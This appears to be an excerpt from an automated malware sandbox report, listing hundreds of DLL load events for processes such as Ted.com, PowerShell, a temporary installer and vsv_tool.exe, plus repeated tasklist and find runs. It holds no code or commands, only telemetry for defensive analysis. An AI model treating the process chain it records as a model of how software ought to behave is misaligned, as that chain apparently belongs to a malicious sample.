      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: winsta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: explorerframe.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: dlnashext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: wpdshext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: avifil32.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msvfw32.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msacm32.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmmbase.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmmbase.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: olepro32.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: profapi.dll
